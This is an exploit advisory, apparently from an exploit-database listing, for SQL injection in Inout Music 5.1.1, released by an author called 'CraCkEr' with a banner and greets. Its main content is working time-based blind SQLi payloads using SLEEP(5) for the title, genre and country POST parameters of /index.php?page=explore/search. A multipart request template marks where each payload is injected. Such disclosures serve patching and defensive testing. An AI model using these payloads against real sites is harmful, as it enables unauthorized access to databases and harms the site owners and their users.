Inout Music 5.1.1 SQL Injection

`┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : inoutscripts.com │  
│ Vendor : Inout Scripts - Nesote Technologies Private Limited │  
│ Software : Inout Music 5.1.1 │  
│ Vuln Type: SQL Injection │  
│ Impact : Database Access │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and │  
│ damage to a company reputation │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Path: /index.php?page=explore/search  
  
Method: POST  
  
POST parameter 'title' is vulnerable to SQLI  
  
---  
Parameter: title (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: title=1' AND (SELECT 9844 FROM (SELECT(SLEEP(5)))scaa) AND 'tLOV'='tLOV  
---  
  
POST parameter 'genre' is vulnerable to SQLI  
  
---  
Parameter: genre (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: title=1&type=videoalbum&genre=1') AND (SELECT 3533 FROM (SELECT(SLEEP(5)))ENgP) AND ('MnKg'='MnKg&country=10  
---  
  
POST parameter 'country' is vulnerable to SQLI  
  
---  
Parameter: country (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: title=1&type=videoalbum&genre=1&country=10 AND (SELECT 4811 FROM (SELECT(SLEEP(5)))nDdo)  
---  
  
  
+-----------------------------------------------------------+  
  
POST /index.php?page=explore/search HTTP/2  
  
  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="title"  
  
love[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="type"  
  
audioalbum  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="genre"  
  
1[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="country"  
  
3[Inject-HERE]  
-----------------------------116235583720082436942508111905--  
  
+-----------------------------------------------------------+  
  
  
[-] Done  
`